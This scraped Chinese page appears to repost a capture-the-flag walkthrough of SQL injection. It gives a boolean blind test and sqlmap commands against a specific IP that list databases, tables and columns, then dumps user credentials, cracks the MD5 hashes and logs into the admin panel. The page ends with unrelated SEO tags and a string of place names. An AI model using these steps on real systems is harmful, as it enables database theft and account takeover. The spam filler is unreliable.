濮阳杆衣贸易有限公司

主頁(yè) > 知識(shí)庫(kù) > sqlmap注入圖文詳解

sqlmap注入圖文詳解

熱門標(biāo)簽:大眾點(diǎn)評(píng)星級(jí)酒店地圖標(biāo)注 云南電商智能外呼系統(tǒng)價(jià)格 拉卡拉外呼系統(tǒng) 高清地圖標(biāo)注道路 臨清電話機(jī)器人 智能外呼系統(tǒng)復(fù)位 話務(wù)外呼系統(tǒng)怎么樣 外東北地圖標(biāo)注 400電話可以辦理嗎

1.發(fā)現(xiàn)此網(wǎng)址可能存在sql注入漏洞,我們進(jìn)行sql盲注入測(cè)試一下是否存在漏洞。

地址欄輸入 and 1=1 發(fā)現(xiàn)頁(yè)面正常顯示。


再次輸入and 1=2 頁(yè)面出現(xiàn)錯(cuò)誤,說(shuō)明該頁(yè)面可能存在sql注入漏洞


2.現(xiàn)在拿出我們的kali工具,sqlmap進(jìn)行注入測(cè)試。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs


3.可以看到存在注入漏洞,掃到了5個(gè)數(shù)據(jù)庫(kù)。要獲取管理員用戶密碼,我們可以先從stormgroup注入。查看stormgroup這個(gè)數(shù)據(jù)庫(kù)存在的表單

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables


4.接下來(lái)查一下member中存在哪些列。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns


5.上一步可以看到,name,password 是不是很熟悉。ok接下來(lái)我們開(kāi)始獲取這兩列的數(shù)據(jù)。


6.可以看到password是經(jīng)過(guò)md5加密,接下來(lái)我們把他解密。這里推薦給大家我自己收集的多種解密網(wǎng)址:解密網(wǎng)址大全點(diǎn)擊這里


7.now! 密碼已經(jīng)呈現(xiàn)在我們眼前!?。?!找到后臺(tái)地址進(jìn)行登錄。


8.END 登錄成功,拿到flag,提交。Gameover !

總結(jié)

本篇文章就到這里了,希望能給你帶來(lái)幫助,也希望您能夠多多關(guān)注腳本之家的更多內(nèi)容!

您可能感興趣的文章:
  • MyBatis 中 SqlMapConfig 配置文件詳解
  • Windows下Sqlmap環(huán)境安裝教程詳解
  • MyBatis直接執(zhí)行SQL的工具SqlMapper
  • Mybatis中SqlMapper配置的擴(kuò)展與應(yīng)用詳細(xì)介紹(1)
  • 使用XSD校驗(yàn)Mybatis的SqlMapper配置文件的方法(2)

標(biāo)簽:阿里 福州 溫州 三明 定西 揚(yáng)州 無(wú)錫 山西

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《sqlmap注入圖文詳解》,本文關(guān)鍵詞  sqlmap,注入,圖文,詳解,sqlmap,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《sqlmap注入圖文詳解》相關(guān)的同類信息!
  • 本頁(yè)收集關(guān)于sqlmap注入圖文詳解的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    兴安盟| 汤原县| 肃南| 东海县| 宁阳县| 海阳市| 睢宁县| 鄂托克前旗| 沁源县| 贡觉县| 云和县| 萨嘎县| 富民县| 友谊县| 中方县| 肃北| 柘荣县| 新营市| 阜城县| 泰宁县| 上杭县| 肇州县| 家居| 木里| 罗定市| 高雄市| 嘉兴市| 乌拉特中旗| 长泰县| 长葛市| 广东省| 汤原县| 汉川市| 乌拉特中旗| 军事| 龙州县| 乐陵市| 禄劝| 嘉义县| 洛川县| 罗田县|